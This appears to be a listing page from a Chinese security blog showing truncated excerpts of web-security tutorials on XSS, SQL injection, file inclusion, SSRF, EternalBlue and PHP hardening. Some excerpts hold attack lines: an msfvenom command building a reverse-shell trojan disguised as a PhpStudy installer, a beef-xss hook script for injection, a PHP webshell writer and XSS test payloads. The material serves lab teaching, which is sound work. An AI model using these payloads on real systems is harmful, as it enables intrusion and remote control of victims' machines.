• 欢迎访问行云博客,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入行云博客 QQ群
  • 本站广招各类优秀作者,详情可以加群联系
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏行云博客吧
OWASP TOP 10

OWASP TOP 10

OWASP Top 10OWASP(开放式Web应用程序安全项目)的工具、文档、论坛和全球各地分会都是开放的,对所有致力于改进应用程序安全的人士开放,其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ,总结了Web应用程序最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。A1 注入injection……

3天教你一招渗透江湖绝学

3天教你一招渗透江湖绝学

教程介绍从漏洞中学习代码,在代码中寻找漏洞,本课程教你学会主流的安全渗透实战技能,让学习网络安全成为一件简单的事!……

网易web安全工程师进阶版

网易web安全工程师进阶版

教程介绍《Web安全工程师(进阶)》是由“ i春秋学院联合网易安全部”出品,资深讲师团队通过精炼的教学内容、丰富的实际场景及综合项目实战,帮助学员纵向提升技能,横向拓宽视野,牢靠掌握Web安全工程师核心知识,成为安全领域高精尖人才。……

网站克隆:setoolkit社工软件

网站克隆:setoolkit社工软件

beef-xss安装beef-xss:1apt install beef-xss安装完成之后运行beef-xss:登录网址:http://192.168.232.138:3000/ui/authentication将beef-xss生成的js代码,放入网站中<script src="http://192.……

msf工具之木马程序制作以及伪装

msf工具之木马程序制作以及伪装

捆绑木马使用msfvenom制作木马程序:#生成木马文件msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.138 -f exe -x /root/PhpStudy2018.exe -o /root/phpstudy.exe将木马文件放入靶机中……

PHP反序列化漏洞原理及示例

PHP反序列化漏洞原理及示例

PHP反序列化序列化与反序列化序列化说通俗点就是把一个对象变成可以传输的字符串。序列化过程中还会对不同属性的变量进行不同方式的变化public的属性在序列化时,直接显示属性名protected的属性在序列化时,会在属性名前增加0x00*0x00,其长度会增加3private的属性在序列化时,会在属性名前增加0x00classna……

未授权访问漏洞原理及复现

未授权访问漏洞原理及复现

未授权访问前提知识ssh免密登录客户端进入.ssh文件1cd .ssh/生成公私钥1ssh-keygen -t rsa上传公钥到服务端 1ssh-copy-id user@ip更改.ssh目录跟私钥的权限1chmod 700 .ssh/1chmod 600 .ssh/id_rsa服务端……

XXE实体注入漏洞详解

XXE实体注入漏洞详解

什么是XXEXML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。原理既然XML可以从外部读取DTD文件,那我们就自然地想到了如果将路径换成另一个文件的路径,那么服务器在解析这个XML……

任意文件包含漏洞的绕过方式

任意文件包含漏洞的绕过方式

前期准备file.php代码<?php $a = $_GET['a']; include($a.'.html'); ?>hack.php代码<?php fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"]);?>')……

任意文件包含漏洞原理解析及演示

任意文件包含漏洞原理解析及演示

原理文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行……

中间件的解析漏洞详解及演示

中间件的解析漏洞详解及演示

解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本,文件等当做可执行的脚本,文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。类型:IIS 5.x/6.0解析漏洞IIS 7.0/IIS 7.5/Nginx <0.8.3畸形解析漏洞Nginx <8.03 空字节代码执行漏洞Apache……

基于JavaScript的rce反弹shell漏洞

基于JavaScript的rce反弹shell漏洞

环境要求kali攻击机192.168.232.131win10靶机192.168.232.140工具地址https://github.com/CroweCybersecurity/ps1encode攻击步骤拉取工具到kali的根目录下1git clone https://github.com/CroweCybers……

永恒之蓝漏洞原理及利用

永恒之蓝漏洞原理及利用

摘要什么是永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过……

RCE(远程命令/代码执行漏洞)原理及复现

RCE(远程命令/代码执行漏洞)原理及复现

作用RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。原理远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后……

SSRF服务端请求伪造——原理及绕过姿势

SSRF服务端请求伪造——原理及绕过姿势

原理SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的……

CSRF跨站请求伪造——原理及复现

CSRF跨站请求伪造——原理及复现

原理CSRF(Cross-site request forgery)跨站请求伪造:通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。 尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。 与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当……

PHP正则表达式

PHP正则表达式

正则表达式1、正则表达式中包含三种元素分别为:量词、元字符、修饰符2、前导字符串:就是符号前面的一个字符或字符串量词 说明+ 匹配任何至少包含一个前导字符串* 匹配任何包含零个或多个前导字符串? 匹配任何包含零个或1个前导字符串. 匹配任意一个字符串{x} 匹配任何包含x个前导字符串{x,y} 匹配任何包含 x 到 y 个前导字符串{……

PHP安全配置

PHP安全配置

一、屏蔽PHP错误信息在配置文件中,设置display_errors=On,开启了PHP错误显示,在PHP程序遇到错误时,会暴露PHP文件和系统路径,从而容易被威胁,我们需要设置:;默认开启;Default Value: On;研发环境开启;Development Value: On;生产环境开启;Production Value: Off;……

PHP建议禁用的危险函数

PHP建议禁用的危险函数

PHP配置文件中的disable_functions选项能够在PHP中禁用指定的函数。PHP中有很多危险的内置功能函数,如果使用不当,可造成系统崩溃。禁用函数可能会为研发带来不便,但禁用的函数太少又可能增加研发人员写出不安全代码的概率,同时为黑客非法获取服务器权限提供遍历。在PHP配置文件中添加需要禁用的函数可以有效避免webshell。在PHP中配置如下……

PHP安全函数过滤

PHP安全函数过滤

这篇文章给大家介绍的内容是关于php中安全过滤函数的总结(附代码),有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助。htmlentities() 函数把字符转换为 HTML 实体1234567891011121314<?php   $a = $_GET[fname]; $a1 = h……

SQL注入详谈

SQL注入详谈

简介所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。原理针对 SQL 注入的攻击行为可描述为通过用户可控参数中注入 SQL 语法,破坏原有 SQL 结构,达到编写程序时意料之外结果的攻击行为。其成因可以归结以下两个原因叠加造成的:1、程序编写者在处理程序和数据库交互时……

网络安全——浅谈HTTPS协议

网络安全——浅谈HTTPS协议

简介HTTPS,安全的HTTP,也被称为HTTP over TLS,TLS的前身是SSL。HTTPS的安全基础是SSL。SSL协议位于TCP/IP协议与各种应用层协议之间,为数据通讯提供安全支持。SSL协议:SSL记录协议–建立在可靠的传输协议之上,为高层协议提供数据封装,压缩、加密等基本功能。SSL握手协议–建立在SSL记录协议之上,用户在实际的数……

网络安全——浅谈HTTP协议

网络安全——浅谈HTTP协议

简介:什么是HTTP?HTTP–Hyper Text Transfer Protocol,超文本传输协议,是一种建立在TCP上的无状态连接,整个基本的工作流程是客户端发送一个HTTP请求,说明客户端想要访问的资源和请求的动作,服务端收到请求之后,服务端开始处理请求,并根据请求做出相应的动作访问服务器资源,最后通过发送HTTP响应把结果返回给客户……

XSS游戏挑战详解(下)

XSS游戏挑战详解(下)

前文:XSS游戏挑战详解(上)level-11查看源代码,发现本关与第十关类似,还发现t_ref参数的值包含上一题提交的参数此时,利用burp抓包,修改referer1" type="text" onclick="alert(1)level-12同上,查看源代码,发现t_ua参数的值为Use……

XSS游戏挑战详解(上)

XSS游戏挑战详解(上)

前言最近刚学到xss,老师发了一个靶场,刚好拿来练练手,提升下技术,本文用于记录。level-1查看源代码,发现有参数name,那么尝试最基本的攻击,通关成功。1<script>alert(1)</script>level-2利用第一关的代码,发现输入的值在input标签内,这时尝试闭合标签……

web渗透测试靶站开源系统

web渗透测试靶站开源系统

分享几个web渗透测试常用网站(靶场)DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。链接地址mutillidaemutillidaemutillidaemutillidae是一……

浅谈xss——跨站脚本攻击(四)

浅谈xss——跨站脚本攻击(四)

前文:浅谈xss——跨站脚本攻击(一)浅谈xss——跨站脚本攻击(二)浅谈xss——跨站脚本攻击(三)讲了这么多攻击方式,这次讲一讲防范方法反射型xss漏洞防范1234567891011121314151617181920212223A.PHP直接输出html的,可以采用以下的方法进行过滤:1.htmlspecialchars函数2.h……

浅谈xss——跨站脚本攻击(三)

浅谈xss——跨站脚本攻击(三)

接上文:浅谈xss——跨站脚本攻击(一)浅谈xss——跨站脚本攻击(二)DOM型xss新建一个Dom.php文件,插入以下代码1234567891011<?php      error_reporting(0); //禁用错误报告      $name = $_G……

浅谈xss——跨站脚本攻击(二)

浅谈xss——跨站脚本攻击(二)

接着上文讲:浅谈xss——跨站脚本攻击(一)这次谈谈存储型XSS和反射性XSS的即时响应相比,存储型XSS则需要先把利用代码保存在比如数据库或文件中,当web程序读取利用代码时再输出在页面上执行利用代码。但存储型XSS不用考虑绕过浏览器的过滤问题,屏蔽性也要好很多。存储型XSS攻击流程:存储型XSS的白盒审计同样要寻找未过滤的输入点和未过滤的输出……

浅谈xss——跨站脚本攻击(一)

浅谈xss——跨站脚本攻击(一)

什么是xssXSS全称:跨站脚本(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets)的缩写CSS混合,所以改名为XSS;攻击者会向web页面(input表单、URL、留言版等位置)插入恶意JavaScript代码,导致管理员/用户访问时触发,从而达到攻击者的目的。xss跨站脚本漏洞非持久型xs……